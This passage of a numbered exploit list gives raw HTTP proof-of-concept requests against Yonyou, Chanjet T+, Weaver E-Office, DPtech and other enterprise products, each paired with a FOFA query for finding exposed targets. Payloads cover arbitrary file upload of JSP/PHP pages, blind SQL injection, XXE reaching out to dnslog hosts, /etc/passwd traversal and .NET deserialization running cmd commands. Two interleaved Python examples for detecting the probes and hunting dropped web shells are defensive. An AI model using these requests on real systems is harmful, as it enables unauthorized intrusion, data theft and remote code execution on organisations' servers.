User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-Type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded content is then served at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

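The NC entries 26 through 34 above all use the same two blind probes, waitfor delay '0:0:5' for SQL Server and DBMS_PIPE.RECEIVE_MESSAGE(...,5) for Oracle, and several later entries in this list reuse them. The following is an added example for defenders, not part of the original list and not vendor code: it runs those probe signatures over web-server access-log lines. The log lines are constructed, the combined log format is assumed, and the endpoint set covers only the NC paths named above (extend it with the other products' paths from this list).

```python
"""Flag the blind SQL-injection probes from the list above in access-log lines."""
import re
from urllib.parse import unquote_plus

# Probe shapes copied from the PoCs on this page: SQL Server time delay,
# Oracle DBMS_PIPE delay, MySQL extractvalue() error-based, SQL Server
# hash-to-string (entries 26-34, 39, 41, 43, 44, 46, 50, 51, 58).
SQLI_PATTERNS = {
    "mssql_waitfor": re.compile(r"waitfor\s+delay\s+'\d+:\d+:\d+'", re.I),
    "oracle_dbms_pipe": re.compile(r"dbms_pipe\.receive_message\s*\(", re.I),
    "mysql_extractvalue": re.compile(r"extractvalue\s*\(\s*1\s*,\s*concat\s*\(", re.I),
    "mssql_hashbytes": re.compile(r"fn_(?:sqlvarbasetostr|varbintohexstr)\s*\(\s*hashbytes\s*\(", re.I),
}

# Vulnerable NC endpoints named in entries 26-34. Assumption: the reader adds
# the other products' paths from this list for their own estate.
NC_ENDPOINTS = frozenset({
    "/portal/pt/yercommon/linkVoucher",
    "/ebvp/infopub/showcontent",
    "/portal/pt/erfile/down/bill",
    "/portal/pt/portalpage/importPml",
    "/portal/pt/servlet/runStateServlet/doPost",
    "/ebvp/advorappcoll/complainbilldetail",
    "/portal/pt/downTax/download",
    "/ebvp/infopub/warningDetailInfo",
})

# Combined log format (assumed): ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Constructed sample lines; the targets are the PoC URLs from entries 26, 27
# and 41 plus one benign request to the same endpoint.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1\'waitfor+delay+\'0:0:5\'-- HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Mar/2024:10:01:09 +0800] "GET /ebvp/infopub/showcontent?id=1\'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1" 500 0',
    '203.0.113.4 - - [12/Mar/2024:10:02:00 +0800] "GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1" 200 1024',
    '192.0.2.9 - - [12/Mar/2024:10:03:00 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=100 HTTP/1.1" 200 2048',
]


def normalize(target: str) -> str:
    """Decode twice (the PoCs mix raw quotes, %27 and + for space; a single
    pass misses %2527) and collapse whitespace so the regexes see one form."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(target)))


def classify(target: str) -> list[str]:
    """Probe families found in one request target, plus a tag when the path is
    one of the NC endpoints above (a hit there is not a false positive to argue about)."""
    norm = normalize(target)
    hits = [name for name, rx in SQLI_PATTERNS.items() if rx.search(norm)]
    if hits and norm.split("?", 1)[0] in NC_ENDPOINTS:
        hits.append("yonyou_nc_endpoint")
    return hits


def scan_log(lines):
    """Yield (client_ip, target, hits, status) for every line carrying a probe."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, target, status, _size = m.groups()
        hits = classify(target)
        if hits:
            yield ip, target, hits, int(status)


if __name__ == "__main__":
    for ip, target, hits, status in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(hits)} {target[:80]}")
```

Probes sent in a POST body (entries 30, 39 and 43) never reach the access log; match those against reverse-proxy or WAF request-body captures instead. A 500 on a probe line, as in the second sample, is worth as much as a 200: it usually means the injected quote reached the database.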
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8 Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Then request the uploaded file through:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is then reachable at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

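Entries 24, 28, 35, 42, 48 and 49 each end with the path where the uploaded file lands (\webapps\nc_web\...jsp, /uapim/static/pages/nc/head.jsp, /tmpfile/updB3CB.tmp.php). The added example below is not part of the original list and not vendor code; it is the post-incident check that follows from those paths: walk the drop directories under a web root and triage every server-side script by content and age. The directory names are taken from the entries above, but their location relative to the web root is an assumption to adjust per deployment, and the marker strings in the demo are constructed copies of the PoC pages.

```python
"""Post-incident check for files dropped through the upload endpoints above."""
import os
import re
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Optional

# Where the PoCs above say the uploads land (entries 24, 28, 35, 49). Assumed to
# be relative to the product's web root; adjust per deployment.
UPLOAD_DROP_DIRS = ("webapps/nc_web", "uapim/static/pages/nc", "tmpfile")
SCRIPT_EXT = frozenset({".jsp", ".jspx", ".php", ".phtml", ".aspx", ".ashx"})

# Primitives a web shell needs; the PoC pages (<% out.println("...") %>) only
# prove the write, a real shell executes what the request carries.
EXEC_RE = re.compile(
    r"Runtime\.getRuntime\(\)|ProcessBuilder|Process\.Start|\beval\s*\(|\bsystem\s*\(|"
    r"shell_exec|passthru|\bexec\s*\(|base64_decode|assert\s*\(",
    re.I,
)
# A page whose only content is one println(): the marker pages written by the PoCs.
PROBE_RE = re.compile(r"^\s*<%\s*out\.println\(\s*\"?[\w*]+\"?\s*\)\s*;?\s*%>\s*$")


@dataclass
class Finding:
    path: str
    reason: str
    age_hours: float


def triage(path: str, content: str, mtime: float, now: float, max_age_h: float) -> Optional[Finding]:
    """Decide whether one file in a drop directory needs a human look."""
    if Path(path).suffix.lower() not in SCRIPT_EXT:
        return None
    age_h = (now - mtime) / 3600.0
    if EXEC_RE.search(content):
        return Finding(path, "command-execution primitive", age_h)
    if PROBE_RE.match(content):
        return Finding(path, "upload PoC marker page", age_h)
    if age_h <= max_age_h:
        return Finding(path, "script written recently into an upload directory", age_h)
    return None


def hunt(web_root: str, max_age_h: float = 72.0, now: Optional[float] = None) -> list[Finding]:
    """Walk the drop directories under web_root and triage every file."""
    now = time.time() if now is None else now
    findings: list[Finding] = []
    for rel in UPLOAD_DROP_DIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(web_root, rel)):
            for name in files:
                full = os.path.join(dirpath, name)
                try:
                    content = Path(full).read_text(errors="replace")
                    mtime = os.path.getmtime(full)
                except OSError:
                    continue
                finding = triage(full, content, mtime, now, max_age_h)
                if finding:
                    findings.append(finding)
    return findings


def demo() -> list[str]:
    """Build a throwaway web root with constructed files and return the reasons found."""
    with tempfile.TemporaryDirectory() as root:
        drop = Path(root, "webapps", "nc_web")
        drop.mkdir(parents=True)
        # Constructed copy of the entry-28 marker page and a minimal JSP shell.
        (drop / "head.jsp").write_text('<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>')
        (drop / "cmd.jsp").write_text('<% Runtime.getRuntime().exec(request.getParameter("c")); %>')
        (drop / "logo.gif").write_bytes(b"GIF89a")
        return sorted(f.reason for f in hunt(root))


if __name__ == "__main__":
    for reason in demo():
        print(reason)
```

Content is checked before age on purpose: an attacker who touches the mtime back still leaves the exec primitive in the file. A marker page such as head.jsp is evidence that someone already proved the upload works and should be treated as the start of an incident, not as noise.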
50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Note: the only PoC recorded for this entry is the path-traversal read of /etc/passwd above, not an upload request.

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. The command it runs writes a marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
    "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
      "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "FileName":"cmd",
      "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
}
}

Step 2: request the following URL; if the marker string comes back, the command executed:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a session Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: send that Cookie with a request to
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
